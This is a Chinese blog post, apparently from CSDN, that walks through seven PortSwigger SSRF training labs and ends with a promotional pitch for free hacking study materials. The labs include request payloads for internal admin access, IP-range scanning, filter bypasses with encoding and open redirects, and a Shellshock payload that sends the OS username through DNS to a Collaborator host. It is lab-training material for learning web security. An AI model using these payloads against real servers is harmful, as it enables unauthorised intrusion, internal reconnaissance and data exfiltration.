burp靶场--ssrf burp靶场–ssrf1.什么是ssrf服务器端请求伪造是一种 Web 安全漏洞允许攻击者导致服务器端应用程序向非预期位置发出请求。 在典型的 SSRF 攻击中攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据例如授权凭据或者代码执行。实验1针对本地服务器的基本 SSRFssrf绕过了admin的访问控制通过get传参数来达到攻击目的将指定用户carlos删除## 进入靶场 https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost ## 操作 浏览/admin并发现您无法直接访问管理页面。 访问一个产品点击“检查库存”在Burp Suite中拦截请求并发送给Burp Repeater。 stockApi将参数 中的 URL 更改为http://localhost/admin。这应该显示管理界面。 读取HTML识别删除目标用户的URL即 http://localhost/admin/delete?usernamecarlos 在参数中提交此URL stockApi以传递SSRF攻击。跟随重定向删除成功实验2针对另一个后端系统的基本 SSRF### 实验要求 该实验室具有库存检查功能可以从内部系统获取数据。 要解决该实验请使用库存检查功能扫描192.168.0.X端口 8080 上管理界面的内部范围然后使用它删除用户carlos。 ### 操作 访问一个产品点击“检查库存”在Burp Suite中拦截请求并发送给Burp Intruder。 单击“清除§”更改stockApi参数http://192.168.0.1:8080/admin然后突出显示 IP 地址的最后一个八位字节数字1单击“添加§”。 切换到“有效负载”选项卡将有效负载类型更改为“数字”然后在“从”、“到”和“步长”框中分别输入 1、255 和 1。 单击“开始攻击”。 单击“状态”列可按状态代码升序对其进行排序。您应该看到一个状态为 200 的条目显示管理界面。 点击这个请求将其发送到Burp Repeater并将其中的路径更改为stockApi/admin/delete?usernamecarlosurl get请求删除用户:实验3带外检测的盲 SSRF### 实验要求 该网站使用分析软件在加载产品页面时获取 Referer 标头中指定的 URL。 要完成本实验请使用此功能向公共 Burp Collaborator 服务器发出 HTTP 请求。 ### 操作 访问一个产品在Burp Suite中拦截请求并发送给Burp Repeater。 转到中继器选项卡。选择 Referer 标头右键单击并选择“插入 Collaborator Payload”将原始域替换为 Burp Collaborator 生成的域。发送请求。 转到“协作者”选项卡然后单击“立即投票”。如果您没有看到列出的任何交互请等待几秒钟然后重试因为服务器端命令是异步执行的。 您应该会看到应用程序根据负载结果发起的一些 DNS 和 HTTP 交互。实验4具有基于黑名单的输入过滤器的SSRF### 实验要求 该实验室具有库存检查功能可以从内部系统获取数据。 要解决该实验请更改库存检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。 开发人员部署了两种较弱的反 SSRF 防御措施您需要绕过它们。 ### 操作 访问一个产品点击“检查库存”在Burp Suite中拦截请求并发送给Burp Repeater。 将参数中的URL修改stockApi为http://127.0.0.1/观察请求被阻止。 通过将 URL 更改为以下内容来绕过阻止http://127.1/ 将 URL 更改为http://127.1/admin观察该 URL 再次被阻止。 通过将“a”双 URL 编码为 %2561 来混淆“a”以访问管理界面并删除目标用户。实验5通过开放重定向漏洞绕过过滤器的 SSRF### 实验要求 该实验室具有库存检查功能可以从内部系统获取数据。 要解决该实验请更改库存检查 URL 以访问管理界面http://192.168.0.12:8080/admin并删除用户carlos。 库存检查器被限制只能访问本地应用程序因此您需要首先找到影响应用程序的开放重定向。 ### 操作 访问一个产品点击“检查库存”在Burp Suite中拦截请求并发送给Burp Repeater。 尝试篡改参数stockApi并观察到不可能使服务器直接向不同的主机发出请求。 单击“下一个产品”观察path参数被放置到重定向响应的 Location 标头中从而导致开放重定向。 创建一个利用开放重定向漏洞的 URL并重定向到管理界面并将其输入stockApi股票检查器的参数中 /product/nextProduct?pathhttp://192.168.0.12:8080/admin 请注意库存检查器遵循重定向并向您显示管理页面。 修改删除目标用户的路径 /product/nextProduct?pathhttp://192.168.0.12:8080/admin/delete?usernamecarlos检测查看库存的流量包检测其功能的数据包发送到repeater创建一个利用开放重定向漏洞的URL重定向到管理界面并将其输入股票检查器上的stockApi参数/product/nextProduct?pathhttp://192.168.0.12:8080/admin实验6带有 Shellshock 漏洞的盲目 SSRF### 实验要求 该网站使用分析软件在加载产品页面时获取 Referer 标头中指定的 URL。 为了完成该实验请使用此功能对端口 8080 范围内的内部服务器 执行盲目 SSRF192.168.0.X攻击。在盲目攻击中对内部服务器使用 Shellshock 负载来窃取操作系统用户的名称。 ### 实验操作 在Burp Suite Professional中从 BApp Store 安装“Collaborator Everywhere”扩展。 将实验室的域添加到 Burp Suite 的目标范围中以便 Collaborator Everywhere 能够瞄准它。 浏览网站。 请注意当您加载产品页面时它会通过 Referer 标头触发与 Burp Collaborator 的 HTTP 交互。 请注意HTTP 交互在 HTTP 请求中包含您的用户代理字符串。 将请求发送到产品页面至 Burp Intruder。 转到Collaborator选项卡并生成唯一的 Burp Collaborator 有效负载。将其放入以下 ​​Shellshock 负载中 () { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN 将 Burp Intruder 请求中的 User-Agent 字符串替换为包含您的 Collaborator 域的 Shellshock 有效负载。 单击“清除§”更改 Referer 标头然后http://192.168.0.1:8080突出显示 IP 地址的最后一个八位字节数字1然后单击“添加§”。 切换到“有效负载”选项卡将有效负载类型更改为“数字”然后在“从”、“到”和“步长”框中分别输入 1、255 和 1。 单击“开始攻击”。 攻击完成后返回“协作者”选项卡然后单击“立即投票”。如果您没有看到列出的任何交互请等待几秒钟然后重试因为服务器端命令是异步执行的。您应该看到由成功的盲目SSRF 攻击所击中的后端系统发起的 DNS 交互。操作系统用户的名称应出现在 DNS 子域中。 要完成实验请输入操作系统用户的名称。为了测试需要安装插件在Burp Suite Professional中从BApp Store安装Collaborator Everywhere扩展插件的检测将实验室域添加到Burp Suite的目标范围以便Collaborator Everywhere将其作为目标。观察HTTP交互在HTTP请求中包含User-Agent字符串。将对产品页面的请求发送给Burp Intruderssrf盲测使用Burp Collaborator 客户端生成唯一的 Burp Collaborator 有效载荷并将其放入以下 Shellshock 有效载荷中() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN我的是() { :; }; /usr/bin/nslookup $(whoami).a0bxi9n7k9aet0253kqkh12io9u0ir6g.oastify.com单击“clear §”更改 Referer 标头http://192.168.0.1:8080然后突出显示 IP 地址的最后一个八位字节数字1单击“添加 §”切换到Payloads选项卡将有效负载类型更改为Numbers并在From、“To和Step框中分别输入1、255和1单击开始攻击”攻击完成后返回Collaborator选项卡然后单击立即轮询。应该看到一个DNS交互它是由被成功的盲SSRF攻击击中的后端系统发起的。操作系统用户的名称应显示在DNS子域中。如果始终没有结果考虑是否是cookie过期换一个cookie或者重新复制一个BP客户端URL提交flag完成实验实验7具有基于白名单的输入过滤器的 SSRF### 实验参考 该实验室具有库存检查功能可以从内部系统获取数据。 要解决该实验请更改库存检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。 开发人员已经部署了您需要绕过的反 SSRF 防御。 ### 实验操作 访问一个产品点击“检查库存”在Burp Suite中拦截请求并发送给Burp Repeater。 将参数中的 URL 更改stockApi为http://127.0.0.1/并观察应用程序正在解析 URL、提取主机名并根据白名单对其进行验证。 将 URL 更改为http://usernamestock.weliketoshop.net/并观察是否已接受该 URL这表明 URL 解析器支持嵌入凭据。 将 a 附加#到用户名并观察该 URL 现在被拒绝。 双 URL 编码#并%2523观察极其可疑的“内部服务器错误”响应表明服务器可能已尝试连接到“用户名”。 要访问管理界面并删除目标用户请将 URL 更改为 http://localhost:80%2523stock.weliketoshop.net/admin/delete?usernamecarlos将URL更改为http://usernamestock.weliketoshop.net/并观察其是否被接受结果表明URL解析器支持嵌入式凭据在用户名后附加一个#观察URL被拒绝完成实验 因为没有管理员凭据所以使用http://localhost:80绕过要访问管理界面并删除目标用户将URL更改为http://localhost:80%2523stock.weliketoshop.net/admin/delete?usernamecarlos参考### ssrfburp靶场 https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost ### burp ssrf靶场参考 https://mp.weixin.qq.com/s/ZUFS8ISQv8qm0iCEB0sh6Q ### payloads:ssrf服务端请求伪造 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery ### owasp 服务端请求伪造ssrf https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery以上就是今天的分享觉得有帮助记得点赞收藏以上所说到的漏洞扫描工具都整理成压缩包了朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】同时还为准备学习网络安全黑客或者正在学习整理了一套360独家内部资料包含以下内容如有需要也可文末获取①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】